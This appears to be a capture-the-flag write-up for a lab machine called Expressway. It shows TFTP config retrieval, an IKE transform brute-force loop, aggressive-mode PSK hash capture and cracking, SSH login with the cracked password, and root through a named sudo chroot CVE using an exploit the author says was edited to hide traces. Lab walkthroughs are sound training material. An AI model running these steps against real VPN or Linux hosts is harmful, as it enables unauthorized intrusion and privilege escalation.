Expressway
Enum
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open tftp Netkit tftpd or atftpd
| tftp-version:
| p: Netkit tftpd or atftpd
| cpe:
| cpe:/a:netkit:netkit
|_ cpe:/a:lefebvre:atftpd
| tftp-enum:
|_ ciscortr.cfg
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
4500/udp open|filtered nat-t-ike
22/tcp OpenSSH 10.0p2
User
Let's investigate UDP ports 69 and 500.
In 69 using the --script=tftp-enum which bruteforces common files, we found iscortr.cfg:
username ike password *****
<SNIP>
crypto ipsec client ezvpn ezvpnclient
connect auto
group 2 key secret-password
mode client
peer 192.168.100.1
!
<SNIP>
crypto isakmp client configuration group rtr-remote
key secret-password
dns 208.67.222.222
domain expressway.htb
pool dynpool
!
We find info about an account called ike that has a password, and different services related to IPSec/IKE VPN. I'm not too familiar with these tools though thankfully there is a great read on hacktricks about them.
Let's attempt a basic IKE scan:
ike-scan -M 10.10.11.87
# Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
# 10.10.11.87 Main Mode Handshake returned
# HDR=(CKY-R=48a131ea2dccdc5c)
# SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
# VID=09002689dfd6b712 (XAUTH)
# VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
#
# Ending ike-scan 1.9.5: 1 hosts scanned in 0.053 seconds (18.88 hosts/sec). 1 returned handshake; 0 returned notify
The fact that the scan worked proves that the service is running an older and vulnerable version of IKE. We also learn interesting facts: Auth=PKS means the service works via password and 1 returned handshake; 0 returned notify means the service is ready to interact with us. This is great news.
Let's try to bruteforce a valid transformation (I realized afterwards that the following approach is a bit overkill: because we got the 1/0 returned we had a simpler alternative than bruteforce)
# Generate flags to bruteforce
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
# Bruteforce
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line 10.10.11.87) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
# Valid trans found: --trans=5,2,1,2
# Valid trans found: --trans=5,2,2,2
# Valid trans found: --trans=5,2,3,2
# Valid trans found: --trans=5,2,4,2
# Valid trans found: --trans=5,2,5,2
# Valid trans found: --trans=5,2,6,2
# Valid trans found: --trans=5,2,7,2
# Valid trans found: --trans=5,2,8,2
# Valid trans found: --trans=5,2,64221,2
# Valid trans found: --trans=5,2,64222,2
# Valid trans found: --trans=5,2,64223,2
# Valid trans found: --trans=5,2,64224,2
# Valid trans found: --trans=5,2,65001,2
# Valid trans found: --trans=5,2,65002,2
# Valid trans found: --trans=5,2,65003,2
# Valid trans found: --trans=5,2,65004,2
# Valid trans found: --trans=5,2,65005,2
# Valid trans found: --trans=5,2,65006,2
# Valid trans found: --trans=5,2,65007,2
# Valid trans found: --trans=5,2,65008,2
# Valid trans found: --trans=5,2,65009,2
# Valid trans found: --trans=5,2,65010,2
ENC,HASH,AUTH,GROUP
- ENC=5: 3DES
- HASH=2: HMAC-SHA
- AUTH: Almost everything
- GROUP=2: 1024-bit MODP group
Let's see if the previous transformations are allowed in Aggressive mode and if so, let's try to grab a crackable hash from it.
while read line; do (echo "Valid trans found: $line" && ike-scan -M -A -Phandshake.txt $line 10.10.11.87) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict-matches.txt
cat handshake.txt
# ec6d3... <snip> ...
psk-crack -d `fzf-wordlists` handshake.txt
# Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
# Running in dictionary cracking mode
# key "freakingrockstarontheroad" matches SHA1 hash 6f1aed8e65aff2d99dfdae1c15af161c8a813a75
This could be the password for the user ike from the beginning, let's try to SSH with ike:freakingrockstarontheroad:
ssh ike@10.10.11.87
ls
# user.txt
cat user.txt
# <redacted>
Root
I started looking around for SUID binaries:
find / -type f -perm -4000 2>/dev/null
# /usr/sbin/exim4
# /usr/local/bin/sudo
# /usr/bin/passwd
# /usr/bin/mount
# /usr/bin/gpasswd
# /usr/bin/su
# /usr/bin/sudo
# <SNIP>
Nothing interesting apart from the weird double sudo?
/usr/local/bin/sudo --version
# Sudo version 1.9.17
# Sudoers policy plugin version 1.9.17
# Sudoers file grammar version 50
# Sudoers I/O plugin version 1.9.17
# Sudoers audit plugin version 1.9.17
/usr/bin/sudo --version
# Sudo version 1.9.13p3
# Sudoers policy plugin version 1.9.13p3
# Sudoers file grammar version 50
# Sudoers I/O plugin version 1.9.13p3
# Sudoers audit plugin version 1.9.13p3
The more up-to-date one is the one we initially see when interacting with sudo.
And it seems that sudo v1.9.13p3 is vulnerable to three different CVEs, as per the debian tracker:
- CVE-2023-27320: Double free in chroot feature.
- CVE-2025-32462: RCE when sudoers file contains bad usernames
- CVE-2025-32463: PrivEsc trough
/etc/nsswitch.confbeing in a user-controlled dir and used via--chroot=
These are all interesting though the last one seems to be the most aligned with our needs let's investigate this file in question and where we could attempt this.
The file is a GNU Name Service Switch, I found a public exploit for CVE-2025-32463
I first edited the exploit a bit to hide my traces and then downloaded it onto the machine and ran it, I got root and got the flag.